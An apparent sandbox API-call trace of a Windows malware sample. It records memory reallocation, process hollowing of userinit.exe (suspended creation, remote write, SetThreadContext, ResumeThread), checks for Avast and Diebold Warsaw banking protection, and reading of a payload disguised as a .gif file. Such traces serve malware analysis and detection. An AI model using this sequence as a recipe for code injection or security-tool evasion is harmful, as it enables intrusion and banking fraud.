[0229.441] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0229.441] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.442] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.442] GlobalUnlock (hMem=0x95000c) returned 0
[0229.442] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0229.442] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.443] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.443] GlobalUnlock (hMem=0x95000c) returned 0
[0229.443] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0229.443] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.444] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.444] GlobalUnlock (hMem=0x95000c) returned 0
[0229.444] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0229.444] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.445] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.445] GlobalUnlock (hMem=0x95000c) returned 0
[0229.445] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0229.445] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.446] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.446] GlobalUnlock (hMem=0x95000c) returned 0
[0229.446] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0229.446] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.447] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.447] GlobalUnlock (hMem=0x95000c) returned 0
[0229.447] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0229.447] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.448] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.448] GlobalUnlock (hMem=0x95000c) returned 0
[0229.448] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0229.448] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.449] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.449] GlobalUnlock (hMem=0x95000c) returned 0
[0229.449] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0229.449] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.450] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.450] GlobalUnlock (hMem=0x95000c) returned 0
[0229.450] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0229.450] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.450] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.450] GlobalUnlock (hMem=0x95000c) returned 0
[0229.450] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0229.451] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.451] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x154, hThread=0x158, dwProcessId=0xa54, dwThreadId=0xa94)) returned 1
[0229.455] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0229.455] GetThreadContext (in: hThread=0x158, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x762be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16fc98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0229.455] ReadProcessMemory (in: hProcess=0x154, lpBaseAddress=0x7ffd8008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0229.455] VirtualAllocEx (hProcess=0x154, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0229.456] VirtualAlloc (lpAddress=0x1cfc000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1cfc000
[0229.462] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x400000, lpBuffer=0x1cf944c*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1cf944c*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0229.475] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x7ffd8008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0229.475] SetThreadContext (hThread=0x158, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16fc98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0229.477] ResumeThread (hThread=0x158) returned 0x1
[0229.477] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0229.477] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.477] GlobalUnlock (hMem=0x95000c) returned 0
[0229.477] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0229.477] GlobalUnlock (hMem=0x950004) returned 0
[0229.484] Sleep (dwMilliseconds=0xe74e)
[0239.485] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0239.485] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0239.485] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0239.485] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0239.486] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160
[0239.486] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0239.486] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0239.486] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0239.486] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0239.488] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0239.488] ReadFile (in: hFile=0x160, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0239.495] CloseHandle (hObject=0x160) returned 1
[0239.495] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.496] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.496] GlobalUnlock (hMem=0x95000c) returned 0
[0239.496] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0239.496] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.497] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.497] GlobalUnlock (hMem=0x95000c) returned 0
[0239.497] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0239.498] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0239.499] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0239.499] GlobalUnlock (hMem=0x95000c) returned 0
[0239.499] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0239.499] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0239.500] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0239.500] GlobalUnlock (hMem=0x95000c) returned 0
[0239.500] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
